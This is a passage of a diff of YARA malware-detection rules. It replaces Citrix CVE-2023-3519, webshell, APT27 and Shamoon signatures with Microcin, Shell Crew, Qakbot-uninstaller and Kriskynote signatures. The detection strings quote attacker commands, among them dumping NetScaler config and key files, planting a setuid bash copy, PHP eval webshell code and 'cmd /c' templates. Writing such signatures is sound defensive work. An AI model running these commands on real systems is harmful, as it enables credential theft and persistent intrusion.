-		$s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii
-		$s6 = "UploadFile - EncryptBuffer Error" fullword ascii
-		$s7 = "WinDLL.dll" fullword wide
-		$s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii
-		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii
-		$s10 = "CDllApp::InitInstance() - Evnet already exists." fullword ascii
+		$s1 = "cmd /c dir /a /s \"%s\" > \"%s\"" fullword wide
+		$s2 = "ini.dat" fullword wide
+		$s3 = "winupdata" fullword wide
+		$f1 = "%s\\(%08x%08x)%s" fullword wide
+		$f2 = "%s\\d%08x\\d%08x.db" fullword wide
+		$f3 = "%s\\u%08x\\u%08x.db" fullword wide
+		$f4 = "%s\\h%08x\\h%08x.db" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or 5 of them )
 }
-rule SIGNATURE_BASE_EXPL_Citrix_Netscaler_ADC_Forensicartifacts_CVE_2023_3519_Jul23_2 : CVE_2023_3519 FILE
+rule SIGNATURE_BASE_Microcin_Sample_5 : FILE
 {
 	meta:
-		description = "Detects forensic artifacts found after an exploitation of Citrix NetScaler ADC CVE-2023-3519"
-		author = "Florian Roth"
-		id = "471ce547-0133-5836-b9d1-02c932ecfd1e"
-		date = "2023-07-21"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd06f9f7-0ba3-52c9-a814-be1cd53e2e42"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/sites/default/files/2023-07/aa23-201a_csa_threat_actors_exploiting_citrix-cve-2023-3519_to_implant_webshells.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L27-L41"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L92-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "48d4225d0935084003f7a98c554d7c4722a91290dfe190001da52bce332b3f7d"
-		score = 70
+		logic_hash = "18b9b80ad3c27f32c71197f33e5e99742662cf5cf4ed5f83d574d44ba63f8b5f"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-3519, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b9c51397e79d5a5fd37647bc4e4ee63018ac3ab9d050b02190403eb717b1366e"
 
 	strings:
-		$s1 = "tar -czvf - /var/tmp/all.txt" ascii fullword
-		$s2 = "-out /var/tmp/test.tar.gz" ascii
-		$s3 = "/test.tar.gz /netscaler/"
+		$x1 = "Sorry, you are not fortuante ^_^, Please try other password dictionary " fullword ascii
+		$x2 = "DomCrack <IP> <UserName> <Password_Dic file path> <option>" fullword ascii
+		$x3 = "The password is \"%s\"         Time: %d(s)" fullword ascii
+		$x4 = "The password is \" %s \"         Time: %d(s)" fullword ascii
+		$x5 = "No password found!" fullword ascii
+		$x7 = "Can not found the Password Dictoonary file! " fullword ascii
 
 	condition:
-		filesize < 10MB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them ) or 2 of them
 }
-rule SIGNATURE_BASE_EXPL_Citrix_Netscaler_ADC_Forensicartifacts_CVE_2023_3519_Jul23_3 : CVE_2023_3519 FILE
+rule SIGNATURE_BASE_Microcin_Sample_6 : FILE
 {
 	meta:
-		description = "Detects forensic artifacts found after an exploitation of Citrix NetScaler ADC CVE-2023-3519"
-		author = "Florian Roth"
-		id = "2f40b423-f1da-5711-ac4f-18de77cd52d0"
-		date = "2023-07-24"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9988723f-a7ca-598f-9a6c-9f3915732117"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L43-L61"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L112-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e78e1a788503b841ed0f4e5cd415eb35d8911092778120d7fd061ed20820da37"
-		score = 70
+		logic_hash = "280fb17b5ed5ff1c8018e426969f75e18589eabeb2a20e0e623f206e72e8958d"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-3519, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cbd43e70dc55e94140099722d7b91b07a3997722d4a539ecc4015f37ea14a26e"
+		hash2 = "871ab24fd6ae15783dd9df5010d794b6121c4316b11f30a55f23ba37eef4b87a"
 
 	strings:
-		$x1 = "cat /flash/nsconfig/ns.conf >>" ascii
-		$x2 = "cat /nsconfig/.F1.key >>" ascii
-		$x3 = "openssl base64 -d < /tmp/" ascii
-		$x4 = "cp /usr/bin/bash /var/tmp/bash" ascii
-		$x5 = "chmod 4775 /var/tmp/bash"
-		$x6 = "pwd;pwd;pwd;pwd;pwd;"
-		$x7 = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
+		$s1 = "** ERROR ** %s: %s" fullword ascii
+		$s2 = "TEMPDATA" fullword wide
+		$s3 = "Bruntime error " fullword wide
 
 	condition:
-		filesize < 10MB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
 }
-rule SIGNATURE_BASE_LOG_EXPL_Citrix_Netscaler_ADC_Exploitation_Attempt_CVE_2023_3519_Jul23_1 : CVE_2023_3519
+rule SIGNATURE_BASE_Streamex_Shellcrew
 {
 	meta:
-		description = "This YARA rule detects forensic artifacts that appear following an attempted exploitation of Citrix NetScaler ADC CVE-2023-3519. The rule identifies an attempt to access the vulnerable function using an overly long URL, a potential sign of attempted exploitation. However, it does not confirm whether such an attempt was successful."
-		author = "Florian Roth"
-		id = "7dfe4130-d976-5d6d-a05d-ccadefe45406"
-		date = "2023-07-27"
+		description = "Detects a "
+		author = "Cylance"
+		id = "217077bb-71b7-5cbf-8adf-68a16688c415"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://blog.assetnote.io/2023/07/24/citrix-rce-part-2-cve-2023-3519/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L63-L77"
+		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shellcrew_streamex.yar#L11-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ad3164c5b2616b12a513a2bb3736d530769e75fca03346a72351a27b8343b2a"
-		score = 65
-		quality = 60
-		tags = "CVE-2023-3519"
+		logic_hash = "a82ff51c1dcd1ebe3d7acc96b46b0b79dcead9146204f060f5413c4c7b5286d3"
+		score = 80
+		quality = 85
+		tags = ""
 
 	strings:
-		$sr1 = /GWTEST FORMS SSO: Parse=0; URLLEN=([2-9][0-9]{2}|[0-9]{4,20}); Event: start=0x/
-		$s1 = ", type=1; Target: start=0x"
+		$a = "0r+8DQY97XGB5iZ4Vf3KsEt61HLoTOuIqJPp2AlncRCgSxUWyebhMdmzvFjNwka="
+		$b = {34 ?? 88 04 11 48 63 C3 48 FF C1 48 3D D8 03 00 00}
+		$bb = {81 86 ?? ?? 00 10 34 ?? 88 86 ?? ?? 00 10 46 81 FE D8 03 00 00}
+		$c = "greendll"
+		$d = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" wide
+		$f = {26 5E 25 24 23 91 91 91 91}
+		$g = "D:\\pdb\\ht_d6.pdb"
 
 	condition:
-		all of them
+		$a or $b or $bb or ( $c and $d ) or $f or $g
 }
-rule SIGNATURE_BASE_WEBSHELL_SECRETSAUCE_Jul23_1 : CVE_2023_3519 FILE
+rule SIGNATURE_BASE_Shellcrew_Streamex_1 : FILE
 {
 	meta:
-		description = "Detects SECRETSAUCE PHP webshells (found after an exploitation of Citrix NetScaler ADC CVE-2023-3519)"
-		author = "Florian Roth"
-		id = "db0542e7-648e-5f60-9838-e07498f58b51"
-		date = "2023-07-24"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L79-L100"
+		description = "Auto-generated rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "26b4cac0-3f2b-5637-86f5-16b7f8afa0e6"
+		date = "2017-02-10"
+		modified = "2022-12-21"
+		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shellcrew_streamex.yar#L40-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c762d46ae43a3e10453c2ee17039812a06086ac85bdb000cf8308f5196a9dee2"
-		score = 85
+		logic_hash = "4da0b8843de87e53243af40700afaab77120531af28dc311d9100bce6721650b"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-3519, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "81f411415aefa5ad7f7ed2365d9a18d0faf33738617afc19215b69c23f212c07"
 
 	strings:
-		$sa1 = "for ($x=0; $x<=1; $x++) {" ascii
-		$sa2 = "$_REQUEST[" ascii
-		$sa3 = "@eval" ascii
-		$sb1 = "public $cmd;" ascii
-		$sb2 = "return @eval($a);" ascii
-		$sb3 = "$z->run($z->get('openssl_public_decrypt'));"
+		$x1 = "cmd.exe /c  \"%s\"" fullword wide
+		$s3 = "uac\\bin\\install_test.pdb" ascii
+		$s5 = "uncompress error:%d %s" fullword ascii
+		$s7 = "%s\\AdobeBak\\Proc.dat" fullword wide
+		$s8 = "e:\\workspace\\boar" fullword ascii
+		$s12 = "$\\data.ini" fullword wide
 
 	condition:
-		filesize < 100KB and ( all of ( $sa* ) or 2 of ( $sb* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 4 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_APT27_Rshell_Jul24 : MALWARE RSHELL___SYSUPDATE FILE
+rule SIGNATURE_BASE_Shellcrew_Streamex_1_Msi : FILE
 {
 	meta:
-		description = "YARA rule to detect RSHELL of APT27"
-		author = "Bundesamt fuer Verfassungsschutz, modified by Florian Roth"
-		id = "67c8ac4e-8e2f-5cca-90cb-5d5fdf6f86b5"
-		date = "2024-07-11"
-		modified = "2024-12-12"
-		reference = "https://x.com/bfv_bund/status/1811364839656185985?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_rshell.yar#L2-L41"
+		description = "Auto-generated rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8cf5dad5-0737-56bf-8cef-7bcf7e7e5a78"
+		date = "2017-02-10"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shellcrew_streamex.yar#L61-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "be5f6281d722bd07e53acd459c794fe3ae870a05ed8979de4c28d357110617bd"
+		logic_hash = "fa853dac58c067a88f1784ac4017fd558151e54ed10ceb32ab90c99e970460fe"
 		score = 75
 		quality = 85
-		tags = "MALWARE, RSHELL / SYSUPDATE, FILE"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		malware = "RSHELL / SYSUPDATE"
-		hash1 = "0433edfad648e1e29be54101abaded690302dc7e49ad916cfbbddf99b3ade12c"
-		hash2 = "10bb89fdf25c88d3c5623e8d68573124c9a42549750014e3675e2ca342aeba4a"
-		hash3 = "2603e1f61363451891c97b0c4ce8acfbfb680d3df4282f9d151ecce3a5679616"
-		hash4 = "70dac42491f8f19568a5d7b1d10b29f732a88d75e7f2bfa07b23202bacadf56f"
-		hash5 = "b988a6583ce40f07e5fc8e890ae2b1c84a93db8a2e3ca8769241b94bea332a7a"
-		hash6 = "c4fe1e56f601d411e2385352606524fb8bbf773bc2ba14889a8de605c2d14da0"
-		hash7 = "c787144d285fcca8a542f7a5525a37bcd089b39068b9a4db7fe3554ee6c08301"
-		hash8 = "ddaa4d23e4651a517fffbd29f0924607ba6b6253171144da5e49237afe91666b"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c9048e2f5ea2ef9516cac06dc0fba8a7e97754468c0d9dc1e5f7bce6dbda2cc"
 
 	strings:
-		$a1 = "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%" ascii
-		$a2 = "/proc/self/exe" ascii
-		$s1 = "HISTFILE" ascii fullword
-		$s2 = "/tmp/guid" ascii fullword
-		$sop1 = { e8 ?? ?? ?? ?? c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? }
-		$sop2 = { c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? f7 d8 }
+		$x1 = "msi.dll.eng" fullword wide
+		$s2 = "ahinovx" fullword ascii
+		$s3 = "jkpsxy47CDEMNSTYbhinqrwx56" fullword ascii
+		$s4 = "PVYdejmrsy12" fullword ascii
+		$s6 = "FLMTUZaijkpsxy45CD" fullword ascii
+		$s7 = "afhopqvw34ABIJOPTYZehmo" fullword ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or ( uint32be( 0 ) == 0xcafebabe and uint32be( 4 ) < 0x20 ) or uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xfeedfacf ) and filesize < 2MB and all of ( $a* ) and 2 of ( $s* ) or 3 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 3 of them )
 }
-rule SIGNATURE_BASE_Shamoon2_Wiper : FILE
+rule SIGNATURE_BASE_Shellcrew_Streamex_1_Msi_Dll : FILE
 {
 	meta:
-		description = "Detects Shamoon 2.0 Wiper Component"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6660a64c-daa4-59e6-aa65-55194cac600c"
-		date = "2016-12-01"
+		id = "56586e0b-010a-5ad5-8822-5d370475aa06"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/jKIfGB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shamoon2.yar#L10-L28"
+		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shellcrew_streamex.yar#L82-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "245b03d9606f2e391f53a60aa333c6b037aa1f013794d83b761813d54782b885"
-		score = 70
+		logic_hash = "087ac07a2bf822f7838ef46296150381cfc9af9b12b4023654023a779efc1db1"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
-		hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
+		hash1 = "883108119d2f4db066fa82e37aa49ecd2dbdacda67eb936b96720663ed6565ce"
+		hash2 = "5311f862d7c824d13eea8293422211e94fb406d95af0ae51358accd4835aaef8"
+		hash3 = "191cbeffa36657ab1ef3939da023cacbc9de0285bbe7775069c3d6e18b372c3f"
 
 	strings:
-		$a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
-		$x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
-		$s1 = "UFWYNYNTS" fullword wide
-		$s2 = "\\\\?\\ElRawDisk" fullword wide
+		$s1 = "NDOGDUA" fullword ascii
+		$s2 = "NsrdsrN" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
+		( uint16( 0 ) == 0x4d9d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Shamoon2_Comcomp : FILE
+rule SIGNATURE_BASE_SUSP_Qakbot_Uninstaller_Shellcode_Aug23
 {
 	meta:
-		description = "Detects Shamoon 2.0 Communication Components"
-		author = "Florian Roth (Nextron Systems) (with Binar.ly)"
-		id = "72068264-4f71-59fb-b3d8-938285ec8c7f"
-		date = "2016-12-01"
+		description = "Detects Qakbot Uninstaller files used by the FBI and Dutch National Police in a disruption operation against the Qakbot in August 2023"
+		author = "Florian Roth"
+		id = "860796ab-689f-5c5f-bc40-3e2ef7fd1d5d"
+		date = "2023-08-30"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/jKIfGB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shamoon2.yar#L30-L48"
+		reference = "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_qakbot_uninstaller.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "edebdbcf17bd9fadc67c7d76839cf569f0ea20127d4e0d216411c35e9ba54208"
-		score = 70
+		logic_hash = "91d26c50bf29517aa68e709ca3b6f32f4ca390f4c2f48e48cd251bfdd5dbcc71"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
+		tags = ""
 
 	strings:
-		$s1 = "mkdir %s%s > nul 2>&1" fullword ascii
-		$s2 = "p[%s%s%d.%s" fullword ascii
-		$op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 }
-		$op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d }
-		$op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c }
+		$xc1 = { E8 00 00 00 00 58 55 89 E5 89 C2 68 03 00 00 00 68 00 2C 00 00 05 20 0A 00 00 50 E8 05 00 00 00 83 C4 04 C9 C3 81 EC 08 01 00 00 53 55 56 57 6A 6B 58 6A 65 5B 6A 72 66 89 84 24 D4 00 00 00 33 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( all of ( $s* ) or all of ( $op* ) )
+		$xc1
 }
-rule SIGNATURE_BASE_Eldos_Rawdisk : FILE
+rule SIGNATURE_BASE_SUSP_Qakbot_Uninstaller_FBI_Aug23
 {
 	meta:
-		description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
-		author = "Florian Roth (Nextron Systems) (with Binar.ly)"
-		id = "8a43f425-86b7-5a05-b7c3-13c78aa905f8"
-		date = "2016-12-01"
-		modified = "2023-01-27"
-		reference = "https://goo.gl/jKIfGB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shamoon2.yar#L50-L75"
+		description = "Detects Qakbot uninstaller used by the FBI / Dutch Police"
+		author = "Florian Roth"
+		id = "499bff56-ff49-53df-9922-227b816c0a36"
+		date = "2023-08-31"
+		modified = "2023-12-05"
+		reference = "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_qakbot_uninstaller.yar#L16-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab09371b91ab6889f342c7992108ad374b5ecf67b6c2144a6282670f177d0f15"
-		score = 50
+		logic_hash = "0ce963190502709edec9434e6a64cb9db7c5553113b686afc56a516350d76baa"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
-		hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
+		tags = ""
+		hash1 = "559cae635f0d870652b9482ef436b31d4bb1a5a0f51750836f328d749291d0b6"
+		hash2 = "855eb5481f77dde5ad8fa6e9d953d4aebc280dddf9461144b16ed62817cc5071"
+		hash3 = "fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0"
 
 	strings:
-		$s1 = "g\\system32\\" wide
-		$s2 = "ztvttw" fullword wide
-		$s3 = "lwizvm" fullword ascii
-		$s4 = "FEJIKC" fullword ascii
-		$s5 = "INZQND" fullword ascii
-		$s6 = "IUTLOM" fullword wide
-		$s7 = "DKFKCK" fullword ascii
-		$op1 = { 94 35 77 73 03 40 eb e9 }
-		$op2 = { 80 7c 41 01 00 74 0a 3d }
-		$op3 = { 74 0a 3d 00 94 35 77 }
+		$op1 = { 69 c1 65 89 07 6c 03 c2 89 84 95 24 f6 ff ff 8b 55 e4 42 89 55 e4 81 fa 70 02 00 00 7c d4 }
+		$op2 = { 42 89 55 e4 81 fa 70 02 00 00 7c d4 f2 0f 10 0d a0 31 00 10 33 f6 f2 0f 10 15 a8 31 00 10 66 90 }
+		$op5 = { 68 48 31 00 10 6a 28 57 e8 e4 fd ff ff 8b 4d fc 83 c4 4c 33 cd 33 c0 }
+		$op6 = { 33 c0 66 39 06 74 0f 0f 1f 80 00 00 00 00 40 66 83 3c 46 00 75 f8 8d 3c 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Coreimpact_Sysdll_Exe
+rule SIGNATURE_BASE_Kriskynote_Mar17_1 : FILE
 {
 	meta:
-		description = "Detects a malware sysdll.exe from the Rocket Kitten APT"
+		description = "Detects Kriskynote Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bac55c00-5d14-59ca-8597-f52b4577be0c"
-		date = "2014-12-27"
-		modified = "2023-01-06"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_coreimpact_agent.yar#L6-L27"
+		id = "b1e5df0c-0112-5fee-85e9-cb0ca31f5234"
+		date = "2017-03-03"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kriskynote.yar#L11-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f89a4d4ae5cca6d69a5256c96111e707"
-		logic_hash = "332b68e797e8ee3e26d797e106ae31e7240585ccb0ea599bebd8ac8f94313eab"
-		score = 70
+		logic_hash = "cc4861f3a612cbaba6abf8ded76972941c879f04b59c29756bf0ba8083bf93ab"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a19c4b615aa54207604b181873e614d84126b639fee2cce3ca9d5bd863f6f577"
+		hash2 = "62b41db0bf63fa45a2c2b0f5df8c2209a5d96bf2bddf82749595c66d30b7ec61"
 
 	strings:
-		$s0 = "d:\\nightly\\sandbox_avg10_vc9_SP1_2011\\source\\avg10\\avg9_all_vs90\\bin\\Rele" ascii
-		$s1 = "Mozilla/5.0" fullword ascii
-		$s3 = "index.php?c=%s&r=%lx" fullword ascii
-		$s4 = "index.php?c=%s&r=%x" fullword ascii
-		$s5 = "127.0.0.1" fullword ascii
-		$s6 = "/info.dat" ascii
-		$s7 = "needroot" fullword ascii
-		$s8 = "./plugins/" ascii
+		$s1 = "gzwrite64" fullword ascii
+		$opa1 = { e8 6b fd ff ff 83 f8 ff 74 65 83 7b 28 00 74 42 }
+		$opb1 = { 8a 04 08 8b 8e a4 16 00 00 88 44 24 0c 66 c7 04 }
+		$opb2 = { 89 4e 6c 89 46 74 e9 ad fc ff ff 8b 46 68 85 c0 }
 
 	condition:
-		$s0 or 6 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and $s1 and ( $opa1 or all of ( $opb* ) )
 }
-rule SIGNATURE_BASE_MAL_Avemaria_RAT_Jul19 : FILE
+rule SIGNATURE_BASE_Kriskynote_Mar17_2 : FILE
 {
 	meta:
-		description = "Detects AveMaria RAT"
+		description = "Detects Kriskynote Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "960048cf-7a56-50cf-8498-549f900770d8"
-		date = "2019-07-01"
+		id = "704baf41-9718-537f-9456-381a9f42fb97"
+		date = "2017-03-03"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/abuse_ch/status/1145697917161934856"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_avemaria_rat.yar#L2-L16"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kriskynote.yar#L32-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a848ec579db6a07faeab5c855a56889b4bfeaa2958d0388f7fe8c6dcdea7e457"
+		logic_hash = "4a1a7c1c75cc64df32d2f055538c5ad15418802733046471520c372a616f1e11"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5a927db1566468f23803746ba0ccc9235c79ca8672b1444822631ddbf2651a59"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cb9a2f77868b28d98e4f9c1b27b7242fec2f2abbc91bfc21fe0573e472c5dfcb"
 
 	strings:
-		$a1 = "operator co_await" fullword ascii
-		$s1 = "uohlyatqn" fullword ascii
-		$s2 = "index = [%d][%d][%d][%d]" fullword ascii
+		$s1 = "fgjfcn8456fgjhfg89653wetwts" fullword ascii
+		$op0 = { 33 c0 80 34 30 03 40 3d e6 21 00 00 72 f4 b8 e6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
 }
-rule SIGNATURE_BASE_Gen_Python_Pyminifier_Encoded_Payload : FILE
+rule SIGNATURE_BASE_Kriskynote_Mar17_3 : FILE
 {
 	meta:
-		description = "Detects python code encoded by pyminifier. Used by the Machete malware as researched by ESET"
-		author = "John Lambert @JohnLaTwC"
-		id = "d7297e6a-e1c7-57dd-a57f-a3b67face2f3"
-		date = "2019-12-16"
+		description = "Detects Kriskynote Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "647fac4c-2326-5a68-9890-8236022c1548"
+		date = "2017-03-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/liftoff/pyminifier"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_python_pyminifier_encoded_payload.yar#L1-L29"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kriskynote.yar#L48-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "01df8765ea35db382d1dd67a502bf1d9647d8fe818ec31abff41c7e41c2816c0"
-		hash = "15d201152a9465497a0f9dd6939e48315b358702c5e2a3c506ad436bb8816da7"
-		hash = "ab91f76394ddf866cc0b315d862a19b57ded93be5dfc2dd0a81e6a43d0c5f301"
